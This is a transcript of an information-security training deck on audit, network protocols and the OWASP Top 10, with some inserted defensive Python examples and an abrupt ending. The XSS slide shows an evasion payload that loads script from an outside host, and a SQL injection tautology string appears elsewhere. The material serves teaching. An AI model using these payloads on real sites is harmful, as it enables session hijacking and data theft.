Information Security- Base Concepts & Leadership

Information Security- Base Concepts & Leadership Jeromie Jackson- CISSP, CISM COBIT & ITIL Certified [email protected] [email protected] 619-368-7353

Transcript of Information Security- Base Concepts & Leadership


Brief Bio.

President - San Diego OWASP
Vice President - San Diego ISACA
CISSP since 1996
CISM, COBIT, & ITIL Certified
SANS Mentor
Security Solutions Architect @ TIG

Articles
− Covered in Forbes Magazine
− Credit Union Business Magazine
− Credit Union Magazine
− CU Times
− Insurance & Technology Review
− CMP Media
− Storage Inc.

Speaking Events
− SPC 2009
− SecureIT 2008
− SecureIT 2009
− Interop
− Government Technology Conference (GTC)
− Many Credit Union Leagues

Agenda

IT Audit is not Enough
Network Security
Web Application Security
Countermeasures
Ignorance is Risk
Managing by Measurement

IT Assessment

IT Audit is not enough

Unclear scope
New vulnerabilities/risks
Use of lagging indicators

Common IT Audit Deficiencies

Third-Party agreements and contracts weak

Employee Awareness Training needed improvement

Too many privileged accounts

Inability to document user privileges

Log collection weak

Critical assets not clearly defined & documented

DR/BCP not regularly tested

Internal controls not routinely reviewed

Change management documentation & consistency lacking

ERP systems riddled with segregation issues

- Paul Proctor and Gartner Risk & Compliance Research Community, March 2007

Human Stupidity

Changing configurations
Installing rogue programs
Human error (audits)

Incorrect User Provisioning

− Automation tools generally too costly for SMB
− “AD-aware” tools often can authenticate but cannot provision access control
− User errors
− Asset owners often do not know what to provision, do not know the granularity capabilities, and generally rely on what has worked previously

“Is-Like”

If using Microsoft “Is-Like” make the account generic

Conduct an IT Risk Assessment

Critical Assets

Critical assets provide services to enable the business

May be external facing
May be a single machine or a set of machines

Risk Management Frameworks & Functions

Frameworks
− NIST (SP800-30)
− Octave
− Octave Allegro
− Factor Analysis for Information Risk (FAIR)

Primary Functions
− Create value
− Integral organizational process
− Continual and systematic
− Focused on continual improvement
− Account for people, process, and technology

Octave Allegro

Great for a small group
Smaller in scope than other options
Can be conducted in waves (IE: IT/Business, etc.)

Containers

Describe where the information resides
May be a single system
May be a group of systems
Does not have to be electronic

Threats

Describe the actors upon which vulnerabilities are executed causing risk to the organization

Threat Trees

Vulnerabilities

Issues which cause a system or process to deliver undesirable results

May impact
− Confidentiality
− Integrity
− Availability

Risks

The result of a threat agent acting upon a vulnerability

Vulnerability exploitation
− Compromise of sensitive data
− Manipulation of funds/account data
− Denial of Service against Internet-facing systems

Deliverables

Identification of critical assets
Ranking of assets
Portfolio view of organizational risks
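A worked version of the assessment process just described (critical assets, containers, threats, vulnerabilities, risks) that produces the two deliverables listed: an asset ranking and a portfolio view. This is an added example, not material from the original deck; the 1..3 scales, the C/I/A weights and the sample risk register are assumptions constructed for illustration.

```python
"""Qualitative risk ranking: score = likelihood x weighted impact on C/I/A.
The scales, weights and sample risks below are assumptions for this example."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class Risk:
    asset: str          # critical asset that enables a business service
    container: str      # where the information resides (system, group, paper)
    threat: str         # actor acting upon the vulnerability
    vulnerability: str  # issue that lets the system deliver undesirable results
    likelihood: int     # 1 = unlikely .. 3 = likely
    impact: Dict[str, int] = field(default_factory=dict)  # C/I/A, each 1..3


# Relative importance of confidentiality, integrity and availability to the
# business; a credit union might weight C and I above A (assumption).
CIA_WEIGHTS = {"C": 1.0, "I": 1.0, "A": 1.0}


def risk_score(r: Risk, weights: Dict[str, float] = CIA_WEIGHTS) -> float:
    """Score = likelihood x weighted impact summed over C, I and A."""
    if not 1 <= r.likelihood <= 3:
        raise ValueError(f"likelihood out of range: {r.likelihood}")
    for area, value in r.impact.items():
        if area not in weights or not 1 <= value <= 3:
            raise ValueError(f"bad impact {area}={value}")
    return r.likelihood * sum(weights[a] * r.impact.get(a, 0) for a in weights)


def risk_portfolio(risks: List[Risk]) -> List[Tuple[float, Risk]]:
    """Portfolio view: every risk, highest score first (ties broken by asset)."""
    return sorted(((risk_score(r), r) for r in risks),
                  key=lambda t: (-t[0], t[1].asset))


def asset_ranking(risks: List[Risk]) -> List[Tuple[str, float]]:
    """Rank critical assets by the worst risk recorded against each of them."""
    worst: Dict[str, float] = {}
    for score, r in risk_portfolio(risks):
        worst[r.asset] = max(worst.get(r.asset, 0.0), score)
    return sorted(worst.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed sample register (not real findings).
SAMPLE_RISKS = [
    Risk("Online banking portal", "DMZ web cluster", "External attacker",
         "Injection flaw in login form", likelihood=3,
         impact={"C": 3, "I": 3, "A": 2}),
    Risk("Core banking database", "Internal DB server", "Malicious insider",
         "Too many privileged accounts", likelihood=2,
         impact={"C": 3, "I": 3, "A": 1}),
    Risk("Branch phone system", "VoIP gateway VLAN", "External attacker",
         "MAC spoofing on voice VLAN", likelihood=1,
         impact={"C": 2, "I": 1, "A": 3}),
]

if __name__ == "__main__":
    for score, r in risk_portfolio(SAMPLE_RISKS):
        print(f"{score:5.1f}  {r.asset:24} {r.threat} -> {r.vulnerability}")
    print(asset_ranking(SAMPLE_RISKS))
```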

Network Security

TCP/IP

Transport Control Protocol / Internet Protocol
The Internet is based on TCP/IP
Designed for unstable networks
IPv4 prominent, with IPv6 growing
TCP, UDP, & ICMP are the primary types of packets

TCP

Connection-oriented
Used when integrity or state is necessary
Maintains state
3-way handshake to initiate a session
Significant overhead compared to UDP

TCP/IP/Packet

Telnet

Command-line interface to the operating system
Commonly used for
− Networking equipment
− UNIX systems
SSH should be used instead

SSH

Encrypted version of Telnet
Enables remote management through the CLI
Preferred method of remote management
Should be used instead of Telnet

HTTP

Hyper Text Transfer Protocol
Pieces of a page come across as unique TCP connections (images, text, etc.)
OK to be used across network segments
− External to DMZ

HTTPS

Secure HTTP
Encrypted with Secure Socket Layer (SSL) or Transport Layer Security (TLS)
SSL inherently flawed based on its use of MD5 for hashing
Application data is now an encrypted payload
May conduct server, and client, authentication
OK to be used across network boundaries
− External to DMZ

SMTP

Simple Mail Transfer Protocol
Over port 25
Used for outbound mail
Notorious for security vulnerabilities
OK to be exposed from the Internet to the DMZ

SMTP Relaying

Allows someone from one domain to relay mail through another SMTP server

An SMTP server should only allow outbound email from the domains it serves

EXPN/VRFY

EXPN - Expand Address
− Attempts to expand the list of email addresses in a mailing list
VRFY - Verify Address
− Attempts to validate email addresses
− Many systems will/should provide a generic response

POP

POP - Post Office Protocol
Port 110
Used to receive email
Can use APOP, which uses strong authentication
APOP or IMAP are the preferred methods

Server Message Block (SMB)

This is the protocol associated with Microsoft file sharing, network printers, and serial ports (IE: for network-based modems)

Due to the complexity and bulkiness of this protocol it is recommended not to allow it across boundaries whenever possible

This should not be allowed on any Internet connections

Remote Desktop Protocol (RDP)

“Windows Terminal Services”
Not recommended for use on the Internet
Instead use:
− VPN
− Citrix
− HTTPS
− VMware

R-Commands

Rsh - Remote Shell
Rlogin - Remote Login
Rcp - Remote Copy
− Etc.
R-commands allow users to define access control rights
− Exploited with “+ +” in .rlogin, etc.
R-commands should not be used - use SSH, etc. instead

IP Security (IPSEC)

Used for VPNs
Can run in two modes
− Tunnel - TCP/IP header encrypted and a new src/dst pair is added to the connection
− Transport - only the payload is encrypted

Tunnel Vs. Transport

Voice Over IP (VOIP)

Allows for phone conversations across IP networks

Many security risks
− Sniffing
− MAC spoofing
− Application vulnerabilities
− Session hijacking

File Transfer Protocol (FTP)

Preferred protocol for transferring files
May be used across boundaries into a DMZ
Historically many vulnerabilities
− I often find exposure here

Trivial File Transfer Protocol (TFTP)

Similar to FTP but less interactive
Not used very often
Can be used inbound into a DMZ

UDP Pros and Cons

Connectionless protocol
No error correction or retransmission
Doesn't require a sequence number or handshake
− MUCH easier to spoof
Only one-way communication
No sequencing
No 3-way handshake

Domain Name System (DNS)

Used to resolve IPs to hostnames and vice versa
− 72.167.183.41 = jeromiejackson.com
− jeromiejackson.com = 72.167.183.41
Single queries use UDP port 53

DNS Zone Transfers

Zone transfers provide a copy of the name table that is stored by the DNS server
Zone transfers occur over TCP 53
Zone transfers should only be available to upstream providers/peers

DNS Caching

When a client requests something to be resolved it will accept more information than what it had inquired about

DNS redirection & spoofing
− Attacker spoofs a reply with bogus data
− Attacker replies with correct data & corrupt data
− Attacker compromises a DNS server & uses it to distribute additional bogus answers to queries

Simple Network Management Protocol (SNMP)

Can provide vast amounts of data about systems

Based on Management Information Base (MIB)s

SNMPv3 is the only version with built-in authentication, privacy, and access control

Internet Control Message Protocol (ICMP)

Used for various tasks
− Ping (Echo Request/Reply)
− Host Not Reachable
− Network Unreachable
− Redirects
Only allow across borders if required

Hijacking

TCP hijacking
− Man-in-the-Middle
− TCP Reset
− MAC spoofing
UDP
− Race condition - respond prior to the legitimate reply
ICMP
− ICMP Redirect through an infected machine/network

BREAK - Next: Web Application Security

Web-App Overview

Cross-Site Scripting
Injection Flaws
Malicious File Execution
Insecure Direct Object Reference
Cross-Site Request Forgery
Information Leakage & Error Handling
Broken Authentication & Session Management
Insecure Cryptographic Storage
Insecure Communications
Failure to Restrict URL Access

Tools Being Used

WebScarab
− Allows for HTML massaging
− Transcoder
Firefox Developer Tools
− Form editing
− Subvert client-side security settings

1- Cross-Site Scripting (XSS)

XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding the content.

XSS allows attackers to execute script in the victim's browser

Worry About Encodings

Original URL: www.comsecinc.com/contact.php
Base64
− d3d3LmNvbXNlY2luYy5jb20vY29udGFjdC5waHA=
URL encoding
− www.comsecinc.com%2Fcontact.php
Derivatives to further obscure intent
− Spaces or content breaks within content

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Vulnerability

Hijack user sessions
Redirect to a hostile location
Website defacement
Possibly introduce worms

Protection

Utilize a standard input validation mechanism
Do not attempt black-list validation
Java - Use Struts <bean:write>
.NET - Use the Microsoft Anti-XSS Library
PHP - Use htmlentities() or htmlspecialchars()
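Why the slides warn about encodings and against black-list validation: the same payload arrives in several encodings and a substring blacklist only sees one of them, whereas output encoding (the htmlspecialchars()/Anti-XSS equivalent) renders the data as text whatever it contains. This is an added example, not code from the original deck; the blacklist pattern and the payload are constructed, and the Base64 string is the one shown on the slide.

```python
"""Blacklist filtering vs. canonicalization plus output encoding.
The blacklist pattern and sample payload are constructed for this example."""
import base64
import html
import re
import urllib.parse

BLACKLIST = re.compile(r"<script", re.IGNORECASE)


def blacklist_says_clean(value: str) -> bool:
    """The approach the slide warns against: reject known-bad substrings."""
    return BLACKLIST.search(value) is None


def canonicalize(value: str) -> str:
    """Undo URL encoding until the value stops changing, so validation sees the
    form the browser will eventually act on (this also handles double encoding)."""
    while True:
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            return value
        value = decoded


def render_unsafe(comment: str) -> str:
    """User data copied into the page as markup."""
    return f"<p>{comment}</p>"


def render_encoded(comment: str) -> str:
    """Output encoding: the data is shown as text no matter what it contains."""
    return f"<p>{html.escape(comment, quote=True)}</p>"


PAYLOAD = "<script>alert('x')</script>"            # constructed sample
URL_ENCODED = urllib.parse.quote(PAYLOAD)         # as it travels in a query string
DOUBLE_ENCODED = urllib.parse.quote(URL_ENCODED)  # one more layer, to slip past filters
SLIDE_B64 = "d3d3LmNvbXNlY2luYy5jb20vY29udGFjdC5waHA="  # Base64 string from the slide


def slide_base64_decodes_to() -> str:
    """Decodes the slide's Base64 example back to the original URL."""
    return base64.b64decode(SLIDE_B64).decode()


if __name__ == "__main__":
    print(blacklist_says_clean(URL_ENCODED))                    # True: filter fooled
    print(blacklist_says_clean(canonicalize(DOUBLE_ENCODED)))   # False once decoded
    print(render_encoded(PAYLOAD))                              # harmless text
    print(slide_base64_decodes_to())
```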

References

RSnake put together a great XSS Cheat Sheet
− http://ha.ckers.org/xss.html

How to Obscure Any URL
− http://www.pc-help.org/obscure.htm

2- Injection Flaws

User-supplied data sent to an interpreter
− SQL
− LDAP
− XPath
− XML
− SOAP
− OS command injection

Vulnerability

SQL injection
− Create, modify, delete, view tables/databases
OS command injection
− Read/modify/delete/create files
− Execute processes with the privileges of the application

Protection

Sanitize input
Enforce least privilege, especially in the database
Avoid detailed error messages
Use strongly typed parameterized queries
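The protection list above, worked through: the concatenated query that lets user data reach the SQL interpreter as code, beside the parameterized form, with the error detail kept away from the caller. This is an added example, not code from the original deck; the in-memory accounts table and the inputs are constructed.

```python
"""String-built SQL vs. parameterized SQL on a constructed sqlite3 table."""
import sqlite3


def setup_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner TEXT, balance INTEGER)")
    con.executemany("INSERT INTO accounts (owner, balance) VALUES (?, ?)",
                    [("alice", 100), ("bob", 250), ("o'brien", 75)])
    return con


def balance_concatenated(con: sqlite3.Connection, owner: str):
    """Vulnerable: the owner value is pasted into the statement text, so quotes
    and keywords in it change the query instead of being compared as data."""
    sql = f"SELECT owner, balance FROM accounts WHERE owner = '{owner}'"
    return con.execute(sql).fetchall()


def balance_parameterized(con: sqlite3.Connection, owner: str):
    """Fixed: the driver sends the value separately; it can only match a row."""
    return con.execute("SELECT owner, balance FROM accounts WHERE owner = ?",
                       (owner,)).fetchall()


def lookup(con: sqlite3.Connection, owner: str) -> dict:
    """Parameterized query plus the slide's other advice: no detailed errors to
    the caller. The details would go to the server log (not modelled here)."""
    try:
        return {"ok": True, "rows": balance_parameterized(con, owner)}
    except sqlite3.Error:
        return {"ok": False, "error": "The request could not be processed."}


TAUTOLOGY = "x' OR '1'='1"   # constructed input: true for every row when concatenated

if __name__ == "__main__":
    db = setup_db()
    print(balance_concatenated(db, TAUTOLOGY))    # every account is returned
    print(balance_parameterized(db, TAUTOLOGY))   # no owner has that literal name
    print(balance_parameterized(db, "o'brien"))   # quotes inside data are harmless
```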

3- Malicious File Execution

Applications using data input for filename usage are generally vulnerable

Vulnerability

Hostile file uploads
Access to sensitive data
Reading confidential data

Protection

Use a “known good” strategy
Sanitize user input
PHP
− Disable allow_url_fopen and allow_url_include
− Disable Register Globals & E_Restrict
Java - Ensure the Security Manager is enabled and properly configured
.NET - Leverage least privilege via the Security Manager

4- Insecure Direct Object Reference

A user's direct access to object references
− IE: filenames & directories

Vulnerability

Hostile file uploads
Access to sensitive data
Reading confidential data

Protection

Avoid exposing private object references
Indirectly reference objects
− Index files as opposed to utilizing their name
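The indirect reference the slide recommends, as a small per-session map: the client only ever sees an opaque index, and the server resolves an index only if this session issued it. This is an added example, not code from the original deck; the statement paths are constructed.

```python
"""Per-session indirect object references: opaque index in, real path out."""
import secrets
from typing import Dict, List, Optional, Tuple


class IndirectReferenceMap:
    """One instance per authenticated session."""

    def __init__(self) -> None:
        self._index_to_ref: Dict[str, str] = {}
        self._ref_to_index: Dict[str, str] = {}

    def expose(self, real_ref: str) -> str:
        """Return the opaque index for a reference the user is entitled to."""
        if real_ref not in self._ref_to_index:
            index = secrets.token_urlsafe(12)   # unguessable, not derived from the name
            self._index_to_ref[index] = real_ref
            self._ref_to_index[real_ref] = index
        return self._ref_to_index[real_ref]

    def resolve(self, index: str) -> Optional[str]:
        """Only indexes this session handed out resolve; anything else is None."""
        return self._index_to_ref.get(index)


def statement_links(session: IndirectReferenceMap, owned: List[str]) -> Dict[str, str]:
    """What the page renders: index -> display label (the path stays server-side)."""
    return {session.expose(path): path.rsplit("/", 1)[-1] for path in owned}


def serve_statement(session: IndirectReferenceMap,
                    requested: str) -> Tuple[int, Optional[str]]:
    """Handler for /statement?id=<index>. Fails closed instead of opening whatever
    file is named in the request, which is what a direct reference would do."""
    path = session.resolve(requested)
    return (404, None) if path is None else (200, path)


# Constructed sample: the statements the logged-in user is entitled to see.
ALICE_STATEMENTS = ["statements/alice/2009-01.pdf", "statements/alice/2009-02.pdf"]

if __name__ == "__main__":
    alice = IndirectReferenceMap()
    links = statement_links(alice, ALICE_STATEMENTS)
    print(links)
    print(serve_statement(alice, next(iter(links))))               # (200, alice's file)
    print(serve_statement(alice, "statements/bob/2009-01.pdf"))    # (404, None)
```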

5- Cross-Site Request Forgery

A CSRF attack forces a logged-on victim’s browser to send a request to a vulnerable web application, which then performs the chosen action on behalf of the victim.

IE: vulnerable banking relationship, shopping site, etc.

Vulnerability

Can exploit the vulnerability on behalf of the attacker
− Submit a bank transfer
− Send credit card information
− Automatically post information out to an Internet site

Protection

Re-authenticate or use transaction signing to ensure that the request is genuine.

Set up external mechanisms such as e-mail or phone contact in order to verify requests or notify the user of the request.

Do not use GET requests (URLs) for sensitive data or to perform value transactions.

Use only POST methods when processing sensitive data from the user.

POST alone is insufficient protection. You must also combine it with random tokens, out of band authentication, or re-authentication to properly protect against CSRF

For ASP.NET, set ViewStateUserKey
− Provides a similar type of check to the random token described above.
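The combination the slides call for, worked through: a value transaction handler that refuses GET and requires a random token bound to the session, since POST alone is insufficient. This is an added example, not code from the original deck; the server key and the request dictionaries are constructed.

```python
"""Per-session CSRF tokens (random nonce + HMAC binding) with POST-only handling."""
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # in production: a key from configuration


def issue_csrf_token(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Fresh random nonce, bound to the session with an HMAC so a token obtained
    in another session does not verify here."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str, key: bytes = SERVER_KEY) -> bool:
    """Recompute the binding for this session and compare in constant time."""
    try:
        nonce, mac = token.split(".", 1)
    except (AttributeError, ValueError):
        return False
    expected = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_transfer(method: str, session_id: str, form: dict) -> int:
    """Value transaction handler; returns the HTTP status it would send."""
    if method != "POST":
        return 405   # never perform a value transaction on a GET (link or image tag)
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403   # token missing, tampered, or issued to a different session
    # ... perform the transfer for form["to"] / form["amount"] here ...
    return 200


if __name__ == "__main__":
    token = issue_csrf_token("sess-alice")
    form = {"to": "123", "amount": "50", "csrf_token": token}
    print(handle_transfer("POST", "sess-alice", form))     # 200
    print(handle_transfer("GET", "sess-alice", form))      # 405
    print(handle_transfer("POST", "sess-mallory", form))   # 403: token from another session
```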

6- Information Leakage & Error Handling

Vulnerability

Data in errors may be useful for social engineering

May disclose internal object references
Often discloses account names

Protection

Disable or limit error handling
A common error handler is often useful
− Can send details out-of-band
Ensure the development team shares a unified approach

7- Broken Authentication & Session Management

Allows an attacker to bypass the I&A process
Often introduced through ancillary authentication functions
− Logout, password management, timeout, remember me, secret question, and account update

Vulnerability

Subversion of authentication within the application

Portions of application go unauthenticated

Protection

Only use the built-in session management mechanism.

Limit or rid your code of custom cookies for authentication or session management

Use a single authentication mechanism

Do not allow the login process to start from an unencrypted page.

Use a timeout period

Check the old password when the user changes to a new password

8- Insecure Cryptographic Storage

Protecting sensitive data with cryptography has become a key part of most web applications. Simply failing to encrypt sensitive data is very widespread.

Vulnerability

Inappropriate information disclosure
Regulatory violation

Protection

Do not create cryptographic algorithms.
Do not use weak algorithms, such as MD5 / SHA1.
− Favor safer alternatives, such as SHA-256 or better.

Generate keys offline and store private keys with extreme care.

Ensure that encrypted data stored on disk is not easy to decrypt.
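The slide's hashing advice applied to a stored secret such as a password: SHA-256 rather than MD5, and, going one step beyond the slide, salted and iterated (PBKDF2-HMAC-SHA256) so the stored value is not easy to reverse. This is an added example, not code from the original deck; the iteration count and the sample secret are assumptions.

```python
"""Unsalted MD5 (what the slide warns against) beside salted, iterated SHA-256."""
import base64
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 200_000   # assumption: raise as hardware allows


def weak_fingerprint(secret: str) -> str:
    """Unsalted MD5: identical for every user with the same secret, fast, and
    friendly to precomputed lookup tables."""
    return hashlib.md5(secret.encode()).hexdigest()


def store_secret(secret: str, salt: Optional[bytes] = None) -> str:
    """Salted, iterated SHA-256; the stored string is self-describing."""
    salt = salt if salt is not None else os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode(),
        base64.b64encode(derived).decode(),
    )


def verify_secret(secret: str, stored: str) -> bool:
    """Recompute with the stored salt and count; compare in constant time."""
    try:
        alg, iterations, salt_b64, derived_b64 = stored.split("$")
        if alg != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(derived_b64)
        candidate = hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, int(iterations))
        return hmac.compare_digest(candidate, expected)
    except (ValueError, TypeError):
        return False   # malformed record never verifies


if __name__ == "__main__":
    print(weak_fingerprint("password"))
    first, second = store_secret("password"), store_secret("password")
    print(first != second)                     # different salts, different records
    print(verify_secret("password", first), verify_secret("Password", first))
```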

9- Insecure Communications

Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications.

Encryption (usually SSL) must be used for all authenticated connections.

In addition, encryption should be used whenever sensitive data is transmitted.

Vulnerability

Inappropriate access to conversations
− Any credentials or sensitive information transmitted.

Protection

Use SSL for all connections that are authenticated or that transmit sensitive or value data

Ensure that communications between infrastructure elements are appropriately protected.

Under PCI Data Security Standard requirement 4, you must protect cardholder data in transit.

10- Failure to Restrict URL Access

Frequently, the only protection for a URL is that links to that page are not presented to unauthorized users

Security by obscurity is not sufficient to protect sensitive functions.

Vulnerability

"Hidden" or "special" URLs, rendered to all users if they know they exist
− /admin/adduser.php or /approveTransfer.do
Applications often allow access to "hidden" files, such as static XML or system-generated reports.

Protection

Ensure the access control matrix is part of the business, architecture, and design of the application

Perform a penetration test
Do not assume that users will be unaware of special or hidden URLs or APIs.
Block access to all file types that your application should never serve.

Action Plan

Embed security early in projects
Utilize standard data validation processes
Implement a standardized error handler
Properly segment the environment(s)
Test all externally-facing applications

Implement Security in Projects

The earlier security is implemented, the lower the cost of the project
− Inception - Ensure plans meet security standards
− Development - Ensure it stays on track
− Implementation - Validate it was implemented appropriately
− Operations - Monitor & measure
− Disposal - Ensure proper asset disposal processes

Implement Standardized Processes for Data Validation

Implement standard error handling processes to limit data exposure

Utilize standardized sanitization processes to ensure consistent quality protection

Properly Segment the Environments

Three-Tier DMZ

Test All External-Facing Applications

Application-test all applications accessible on the Internet

Assess all systems which utilize restricted data
− (Healthcare, credit cards, ACH transfers, etc.)

Strength in Numbers

Join local associations
− OWASP & ISACA

ComSec Services

Qualifications
− OWASP SD Chapter President
− CISSP & CISM practitioners
− Board members of ISACA
− ITIL & COBIT certified
− NSS Labs Advisory Board
− 800+ regulated customers

Security Services
− Virtual CISO
− Social engineering
− Risk assessment
− Awareness training
− Security assessment
− Policy development

Contact Information

Jeromie Jackson- CISSP/CISM

[email protected]

ComSec, Inc.

702-866-9412

Part 3: Technical Countermeasures

Firewalls

IP filtering
− (Src, port, dst, port, flags)
− IP ACLs

Stateful inspection
− Just like IP filtering but maintains state
− Identifies existing flows and uses them for the rule base

Application-level
− Understands the application
− IE: can allow FTP PUT, but not GET
− Enables least privilege
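The first two firewall types above in contrast: a packet filter decides per packet on (src, sport, dst, dport, flags) and therefore needs a standing return hole, while stateful inspection remembers the flows the rule base allowed and admits only their traffic. This is an added example, not code from the original deck; the address plan, rule base and packets are constructed, and the application-level type is not modelled.

```python
"""Stateless packet filtering vs. stateful inspection over the same rule base."""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False   # the only TCP flags this model looks at
    ack: bool = False


INTERNAL_PREFIX = "10.0.0."     # constructed address plan
OUTBOUND_PORTS = {80, 443}      # rule base: internal hosts may browse out


def is_internal(ip: str) -> bool:
    return ip.startswith(INTERNAL_PREFIX)


def packet_filter(pkt: Packet) -> bool:
    """Stateless IP filtering. It cannot tell a reply from an unsolicited packet,
    so it must hold open a return hole: anything from port 80/443 to a high port."""
    if is_internal(pkt.src) and not is_internal(pkt.dst) and pkt.dport in OUTBOUND_PORTS:
        return True
    if (not is_internal(pkt.src) and is_internal(pkt.dst)
            and pkt.sport in OUTBOUND_PORTS and pkt.dport >= 1024):
        return True
    return False


Flow = Tuple[str, int, str, int]


class StatefulFirewall:
    """Only the first packet of a connection is matched against the rule base;
    every later packet must belong to a flow already recorded."""

    def __init__(self) -> None:
        self.flows: Set[Flow] = set()

    def inspect(self, pkt: Packet) -> bool:
        forward: Flow = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        reverse: Flow = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if forward in self.flows or reverse in self.flows:
            return True                                   # existing flow, either direction
        if (pkt.syn and not pkt.ack and is_internal(pkt.src)
                and not is_internal(pkt.dst) and pkt.dport in OUTBOUND_PORTS):
            self.flows.add(forward)                       # new outbound connection
            return True
        return False                                      # unsolicited inbound: dropped


# Constructed traffic: a browser session, then an unsolicited probe sent "from port 80".
OUT_SYN = Packet("10.0.0.5", 51000, "198.51.100.10", 80, syn=True)
REPLY = Packet("198.51.100.10", 80, "10.0.0.5", 51000, syn=True, ack=True)
PROBE = Packet("198.51.100.99", 80, "10.0.0.5", 51001, syn=True)


def compare() -> Dict[str, List[bool]]:
    """Verdicts of both engines on the same three packets, in order."""
    fw = StatefulFirewall()
    return {
        "stateless": [packet_filter(p) for p in (OUT_SYN, REPLY, PROBE)],
        "stateful": [fw.inspect(p) for p in (OUT_SYN, REPLY, PROBE)],
    }


if __name__ == "__main__":
    print(compare())   # the packet filter admits the probe; stateful inspection does not
```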

Intrusion Detection/Prevention (IDS/IPS)

Can be signature- or anomaly-based
Signature
− Floods
− Brute force
− SQL injection
Anomaly
− Keystrokes & typing
− Standard system usage
− Obscure destinations or services being utilized

Web Application Firewall (WAF)

Monitors and mitigates web-based vulnerabilities

Some IDS/IPS signatures may see these
Some provide application profiling
− Imperva
− Breach
− DataPower

Antivirus/ Anti-Malware

Mostly signature-based
− Identified files/processes
Whitelisting becoming more prevalent
Should be deployed at the desktop & at the gateway
Preferably two different engines/vendors

Content Filtering

Blocking sites and/or frames in a site
Can be white-list or black-list based
Sometimes used for anticipated productivity gains

Authentication

3 factors of authentication
− Something you know: PIN, password
− Something you have: smart card, RFID card, digital certificate
− Something you are: biometrics

Log Management

Logs are of critical importance to auditors
− Centralized
− Monitored
− Escalated
− Consistent
− Secure

SIMs are a great way to correlate these
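What a signature such as the “brute force” one above looks like when run over centralized logs, plus the kind of correlation a SIM adds: a success from a source already flagged is escalated. This is an added example, not code from the original deck; the log lines are constructed in sshd style and the threshold, window and year are assumed tuning values.

```python
"""Sliding-window brute-force detection with success-after-failures correlation."""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional, Tuple

LOG_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Failed|Accepted) password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+"
)
THRESHOLD = 5   # failures ...
WINDOW = 60     # ... within this many seconds from one source (assumed tuning)

# Constructed sample log, not a real capture.
SAMPLE_LOG = """\
Mar 10 09:01:01 gw sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Mar 10 09:01:03 gw sshd[2212]: Failed password for root from 203.0.113.7 port 51023 ssh2
Mar 10 09:01:05 gw sshd[2213]: Failed password for root from 203.0.113.7 port 51024 ssh2
Mar 10 09:01:07 gw sshd[2214]: Failed password for jjackson from 203.0.113.7 port 51025 ssh2
Mar 10 09:01:09 gw sshd[2215]: Failed password for jjackson from 203.0.113.7 port 51026 ssh2
Mar 10 09:01:20 gw sshd[2216]: Accepted password for jjackson from 203.0.113.7 port 51027 ssh2
Mar 10 09:02:10 gw sshd[2217]: Failed password for jjackson from 198.51.100.4 port 40001 ssh2
Mar 10 09:05:30 gw sshd[2218]: Failed password for jjackson from 198.51.100.4 port 40002 ssh2
Mar 10 09:05:45 gw sshd[2219]: Accepted password for jjackson from 198.51.100.4 port 40003 ssh2
"""


def parse(line: str, year: int = 2009) -> Optional[Tuple[datetime, str, str, str]]:
    """Syslog lines carry no year; the caller supplies it (assumption)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, m.group(2), m.group(3), m.group(4)   # time, result, user, source


def detect(lines: List[str], threshold: int = THRESHOLD,
           window: int = WINDOW) -> List[Tuple]:
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)   # failures per source
    flagged = set()
    alerts: List[Tuple] = []
    for line in lines:
        event = parse(line)
        if event is None:
            continue                                  # not an auth event
        ts, result, user, src = event
        if result == "Failed":
            q = recent[src]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window:
                q.popleft()                           # slide the window forward
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("brute_force", src, ts))
        elif result == "Accepted" and src in flagged:
            alerts.append(("success_after_brute_force", src, user, ts))   # escalate
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```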

Access Control

Role-based
User-based

Permissions (MAC & DAC)

Discretionary Access Control
− At the user's discretion
− Found on most multi-user operating systems
− (Read, Write, Execute / User, Group, Other)

Mandatory Access Control
− Objects are given labels
− Labels often hard-coded
− Specific access control provisions used (IE: read down, write equal)
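The two permission models above as checkable functions: Unix-style DAC (read/write/execute for user, group, other) and a label-based MAC with the “read down, write equal” rule. This is an added example, not code from the original deck; the label hierarchy and the sample file are constructed, and root's overrides are not modelled.

```python
"""DAC (rwx / user-group-other) and MAC (read down, write equal) as functions."""
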